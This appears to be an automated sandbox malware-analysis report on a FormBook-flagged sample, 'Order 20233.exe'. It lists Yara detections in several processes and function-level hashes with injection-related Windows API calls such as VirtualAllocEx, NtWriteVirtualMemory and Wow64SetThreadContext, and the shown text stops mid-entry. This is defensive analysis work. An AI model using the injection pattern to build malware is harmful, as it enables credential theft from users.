Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

Show Windows behavior

Chronological Activities

Analysis Process: mstsc.exePID: 5380, Parent PID: 3452

General

Target ID:	21
Start time:	16:24:21
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0x1310000
File size:	3444224 bytes
MD5 hash:	2412003BE253A515C620CE4890F3D8F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Order 20233.exePID: 5872, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	28.4%
Total number of Nodes:	317
Total number of Limit Nodes:	51

Executed Functions

Function 00007FFBAD38D285 Relevance: 4.3, Strings: 2, Instructions: 1805COMMON

Download Yara Rule

Strings

\^_H, xrefs: 00007FFBAD38DEED
B^_L, xrefs: 00007FFBAD38E26D

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID: B^_L$\^_H
API String ID: 0-1834631119
Opcode ID: e7c5c968a5b7786a3f398d975491f4fd50657a0d0c41a2691bc1581189669794
Instruction ID: f5e2097271f3e294c81da9daeda3ee3472ba253819ef0b9e0589d47a9abc5ea8
Opcode Fuzzy Hash: e7c5c968a5b7786a3f398d975491f4fd50657a0d0c41a2691bc1581189669794
Instruction Fuzzy Hash: 72C27C7160DB894FD35ADB38D4814B9B7E1FF99301B0445BED88AC72A6EE34E846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD3948D9 Relevance: 3.6, Strings: 2, Instructions: 1062
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]_H, xrefs: 00007FFBAD394FED
]_H, xrefs: 00007FFBAD3950ED

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID: ]_H$]_H
API String ID: 0-2410564456
Opcode ID: 6216affd5d0d0dcfc61ce8793433fe6d0fc6ab05917944b9467c835c00b9fe9d
Instruction ID: 68884289cbfaae6fa563e617b26eda840429a1a7e06f2d12e7e1e3571d176f05
Opcode Fuzzy Hash: 6216affd5d0d0dcfc61ce8793433fe6d0fc6ab05917944b9467c835c00b9fe9d
Instruction Fuzzy Hash: B7629D7160EF494FE75ADB38C4656B9B7E1FF99310B0401BED48AC7292EE25E846C381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD3830A0 Relevance: 2.6, APIs: 1, Instructions: 1087COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb6169c834b509f6fd67b95e4313b98c9f1acbe9d22b587758f71d3dad6fb7a
Instruction ID: 169fecc1749952c06a2e619f1de6d6061b2241cf514a936360b927b35eab7e75
Opcode Fuzzy Hash: 5cb6169c834b509f6fd67b95e4313b98c9f1acbe9d22b587758f71d3dad6fb7a
Instruction Fuzzy Hash: 92825AB190DA464FE75ACB24C4617B8B7E1EF99310F1441BDD88F875D3EE28A846C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD38BD36 Relevance: 2.2, Strings: 1, Instructions: 921
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Jr_E, xrefs: 00007FFBAD38C19E

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID: Jr_E
API String ID: 0-3104649215
Opcode ID: a7eac51f739f8ff83a28f616dc8d78d483fb5f3ee05aba3ef9225901f0ae52ce
Instruction ID: ea644d4a06a51f4aaf05786fb41c3d2fe735391f99109c11f488f0dcb9419af6
Opcode Fuzzy Hash: a7eac51f739f8ff83a28f616dc8d78d483fb5f3ee05aba3ef9225901f0ae52ce
Instruction Fuzzy Hash: B552D371B09A0A8FDBA9DB2CD455A79B7E1EF59301F1401BEE44EC7292DE24EC42CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD39A0AD Relevance: 2.1, APIs: 1, Instructions: 613
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c9619c8e79425f1c9be020c26792ac1dc3a9ff3e9763ddd1bcfa1d9f4d62c70
Instruction ID: 5481768218a3a8c01f5b0179f039e5f6703fc03d91ec513eac52d9835fbcf94d
Opcode Fuzzy Hash: 1c9619c8e79425f1c9be020c26792ac1dc3a9ff3e9763ddd1bcfa1d9f4d62c70
Instruction Fuzzy Hash: 1212AC7190DB854FE75ACB38C4952E9B7E1FF95310F0402BED88AC7292EE35A946C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD3830B0 Relevance: 1.7, Strings: 1, Instructions: 438
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFBAD3831D0

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: b3dd7e8df2f6c27216e8992a2417eeca02d4bde9da57ab49a18b13fd82b99270
Instruction ID: 5713e8f2180bf1448ade37e7b3e58fda8d484cd0cf4704ee1905dc6ca63c7b88
Opcode Fuzzy Hash: b3dd7e8df2f6c27216e8992a2417eeca02d4bde9da57ab49a18b13fd82b99270
Instruction Fuzzy Hash: FDC12CB6B1DE890FE759E67CD8550BDB7D1FF99310B04057EE48BC3293ED24A8068682

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD399F90 Relevance: 1.6, APIs: 1, Instructions: 138
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFBAD39A06A

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 6dcd52fb1d725000e8816915ef455fa7f1dfbdf005eb25f6194f40e26de8ada7
Instruction ID: e1b458b29266622fd708659ee18edfeca55fc14627206c12f44a298c35cd3a4d
Opcode Fuzzy Hash: 6dcd52fb1d725000e8816915ef455fa7f1dfbdf005eb25f6194f40e26de8ada7
Instruction Fuzzy Hash: C141E57191CB488FDB18DF58D8457EDBBE0FB99321F00426FE489D3292DA74A845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD39A538 Relevance: 1.6, APIs: 1, Instructions: 100
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL ref: 00007FFBAD39A5C5

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a9e7f9b017fdb256f629dff6a838a24933cca89aa15d7437b8662332f96ef851
Instruction ID: 34cdcc3468593c13cb695c4e9e8ab2a5a50d450e6f4f88235a839170a5c27949
Opcode Fuzzy Hash: a9e7f9b017fdb256f629dff6a838a24933cca89aa15d7437b8662332f96ef851
Instruction Fuzzy Hash: 6921A07190CA1C8FDB58DF98D845BEDBBE0EB59321F04416BD409D3252DB70A906CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD385588 Relevance: .9, Instructions: 909COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0054452c0a926d6c791bc14e2ea830de3a463ac4d9b33a6e501598f213a6f0d4
Instruction ID: 96f36207bf36df26ed92b182f1a19bfdff146e7582ff789b4f36dff5dfcbebf0
Opcode Fuzzy Hash: 0054452c0a926d6c791bc14e2ea830de3a463ac4d9b33a6e501598f213a6f0d4
Instruction Fuzzy Hash: A462D3B051AE098FE75ADB28C4906B9B3E1FF98314B6045BDD48BC7696EE35F842C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD3854F8 Relevance: .8, Instructions: 800COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe56b8ac8c2d7afca47ef93507658d724196182f528b935f2a12d421a075aa5a
Instruction ID: 58e0e1831a3180aead48800c7fab0c3a9990ddf2d525c08bdb83effc2f89a432
Opcode Fuzzy Hash: fe56b8ac8c2d7afca47ef93507658d724196182f528b935f2a12d421a075aa5a
Instruction Fuzzy Hash: 59424B7161EE894FE75ADB38C4A5679B7E1FF99300B0401BED84EC7192ED24E846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD382FD0 Relevance: .7, Instructions: 742COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf361b0d017031e6c47e515edf5c58723df1fe0e01977abbcc3f9fd6efd987e
Instruction ID: cd73749be59cd2fa002ec58bae7de52f36a92fd634bdb9e87cc42fce088485f9
Opcode Fuzzy Hash: aaf361b0d017031e6c47e515edf5c58723df1fe0e01977abbcc3f9fd6efd987e
Instruction Fuzzy Hash: BD2229A2B0EE4A4FE79AD73CD455679B7D1FF98311B0401BED84EC7292FD18A8068381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD38A969 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a91a139b11f81dcb584c7ff6631a6838ff834ed331b6063a83dd81f4fffe49a
Instruction ID: 94e48c0ed433e8267736e50a6dae180f6c2c56e49f5adcaf5d7644c40bbdb047
Opcode Fuzzy Hash: 4a91a139b11f81dcb584c7ff6631a6838ff834ed331b6063a83dd81f4fffe49a
Instruction Fuzzy Hash: 03F15B7160DF864FE35ECB38C4911B9B7D2FF94301B1446BDD8CAC72A5EA28A946C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD397F40 Relevance: 1.8, APIs: 1, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32e3ea838a025f14aa3d36af2ba8bd6215f8bdd051b16da2c099dd621cd9d0a
Instruction ID: 404cf967448709efe5a0274d414eff8118ef63a70dc8bbe412ce58d37e85bd37
Opcode Fuzzy Hash: b32e3ea838a025f14aa3d36af2ba8bd6215f8bdd051b16da2c099dd621cd9d0a
Instruction Fuzzy Hash: 96818FB180DA894FE75ADB68CC167F9BBE0FF59310F0402BED48AC7192EA645846C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD397CE1 Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FFBAD397ECF

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7f60c11a06e7c231cf6d051506700c846bbbc7fb623777a2fd018018365ebb9b
Instruction ID: c778906c26226ac86b85aee293a289bec0ae9d6b84cd3112176529d6d95f3a7e
Opcode Fuzzy Hash: 7f60c11a06e7c231cf6d051506700c846bbbc7fb623777a2fd018018365ebb9b
Instruction Fuzzy Hash: 3D818C71808A5C8FDB69DF58D855AE9BBF0FB98311F1042AAD449E7281DB30A985CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD381D90 Relevance: 1.6, APIs: 1, Instructions: 121
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFBAD381E3A

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d3c019cf9f1a2f8330261c2a12026732b781f66d2e2b8b3d82846f3671437afa
Instruction ID: 2b40e4e6e7611e911098a19a4504355146005fd6002b3d8b8f9990ccf96ecc0c
Opcode Fuzzy Hash: d3c019cf9f1a2f8330261c2a12026732b781f66d2e2b8b3d82846f3671437afa
Instruction Fuzzy Hash: DF31D43190CB5C4FDB18DB9C98066FD7BE1EF95721F04426FE049D3252DA746806CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD381039 Relevance: 1.6, APIs: 1, Instructions: 121
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FFBAD3810E7

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4d5bd1cbadc9fe95ab228a8fcad7fef12734cfed7d0ae8b12684dde2cefa7eba
Instruction ID: c5af5d4f59f27d7f246bf58aa9c344c89723245c0cba502ab933baad3e22067b
Opcode Fuzzy Hash: 4d5bd1cbadc9fe95ab228a8fcad7fef12734cfed7d0ae8b12684dde2cefa7eba
Instruction Fuzzy Hash: 7531247190CA9C8FDB59DB68D849AF9BBF0FF55320F04826FD009D3192DB64A806CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD3980A9 Relevance: 1.6, APIs: 1, Instructions: 112
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FFBAD39814D

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8a8f238de8113fbfaa01eafe87d261c7eaeb004726eaae956dc5c9e706a7a27b
Instruction ID: 5097c805c43f06da2292ab47ea93477073819ec53ff3e97994d4b308fc61d5db
Opcode Fuzzy Hash: 8a8f238de8113fbfaa01eafe87d261c7eaeb004726eaae956dc5c9e706a7a27b
Instruction Fuzzy Hash: 7A31EF7190CB1C8FDB59DF68C8897E97BE0EF59310F04016BD449C7252DB70A805CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD399EB8 Relevance: 1.6, APIs: 1, Instructions: 109
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFBAD399F55

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e80c03c18ffd422e38b7d2080900b7020d4f8963eefa59248d49b87e9c8c935c
Instruction ID: 58906877fce7cc3aadb7dda9cb8d57c4c5bf7f3eec96f0ff568d7fe127c9186b
Opcode Fuzzy Hash: e80c03c18ffd422e38b7d2080900b7020d4f8963eefa59248d49b87e9c8c935c
Instruction Fuzzy Hash: CF31D43191CB4C9FDB08EB58D846AF8B7E0FB59321F10422EE04AD3252DB7068168B95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD440000 Relevance: .9, Instructions: 901COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319947371.00007FFBAD440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad440000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6fb8ba2b79b400766132d9987322480eeb7c96dda043195b1f9632968e3659a
Instruction ID: 51a77941ead384ab9d3ecfab0c96eec42b110d9096f15fbe91b1ddd001e2a6a2
Opcode Fuzzy Hash: b6fb8ba2b79b400766132d9987322480eeb7c96dda043195b1f9632968e3659a
Instruction Fuzzy Hash: B7420AF290E7C60FE757C67898661A47FE1EF5A210F0805FBD4C9CB1A3ED1868568392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD4413C8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319947371.00007FFBAD440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad440000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99269c5b23089ba6f609c42e794a0024c272f7d21cbfbd5daf053d587d909d20
Instruction ID: 05e4b087e8242d4eef44ef725f33187505ca880ada8f380316da347487d61ebc
Opcode Fuzzy Hash: 99269c5b23089ba6f609c42e794a0024c272f7d21cbfbd5daf053d587d909d20
Instruction Fuzzy Hash: C91127B270DB490FD749DA2CE8515B9B7D1FBD9350F0406AED08AC7243D915A842C386

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD4417D4 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319947371.00007FFBAD440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad440000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100b492f2b66ad127c0995106aa102f2f2c008fb8590aa2ed83249a22a1cca1f
Instruction ID: b47b2e06f8821ac73962a0430844bb295ec2884c733518f3f8fd02e37cc1ed19
Opcode Fuzzy Hash: 100b492f2b66ad127c0995106aa102f2f2c008fb8590aa2ed83249a22a1cca1f
Instruction Fuzzy Hash: 71116FF370DE094FDB85D61CD8559B9F7D1EBE8360B04457FD48AC3152ED2594828382

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFBAD3854F0 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9155c82ff4f2cd3834f639b30d00d53fb56758eea4da288e33deef0981400cad
Instruction ID: 41a3be7c50da078cb0994439ecf7bb27c9216e7275739a69ef196765bc1cdc40
Opcode Fuzzy Hash: 9155c82ff4f2cd3834f639b30d00d53fb56758eea4da288e33deef0981400cad
Instruction Fuzzy Hash: 44718EB290EF890FE32A9A78D895675B7E0EF45310B0901FDD89BC7293E915A8038391

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exePID: 4392, Parent PID: 5872COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	0.2%
Total number of Nodes:	652
Total number of Limit Nodes:	85

Executed Functions

Function 004012A7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C

Strings

&}=s, xrefs: 00401493

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: &}=s
API String ID: 2706961497-1540406469
Opcode ID: 044ade6dd170b48eea2f2ab5a254278a632c0fb403118301ce47098cf6612e00
Instruction ID: 90ab56fb4ca6507612452dc750a805c8da0c63e195e6b00e2c8ff9afa271c659
Opcode Fuzzy Hash: 044ade6dd170b48eea2f2ab5a254278a632c0fb403118301ce47098cf6612e00
Instruction Fuzzy Hash: 288125B2C2075C9ADF10CFE4CC41AEEBBB4BF99304F20525EE505BB291E77416858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041E091 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0D0

Strings

HD@, xrefs: 0041E0B3, 0041E0BF

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HD@
API String ID: 2167126740-1661062907
Opcode ID: f298d34d088ffd7885f24621ca2974d5dce512efca20f5907bbf958487ae7385
Instruction ID: d453e7a335927250c99f004e6cc8c6fdb7187d88af5c7302b8f341463bd13bfa
Opcode Fuzzy Hash: f298d34d088ffd7885f24621ca2974d5dce512efca20f5907bbf958487ae7385
Instruction Fuzzy Hash: 7CF058B2200119AFCB18DF99DC41EDB37AEEF88354F01810ABE0997251CA30F811CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E097 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0D0

Strings

HD@, xrefs: 0041E0B3, 0041E0BF

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HD@
API String ID: 2167126740-1661062907
Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction ID: 618cacc9d955091c37b283641f352ee75933b55fd80a6a003cdf773a50a2a1f8
Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction Fuzzy Hash: DFF015B6200219ABCB18DF89DC81EEB77ADAF88754F018109BE0997242C630F810CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C

Memory Dump Source

Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd

Yara matches

Similarity

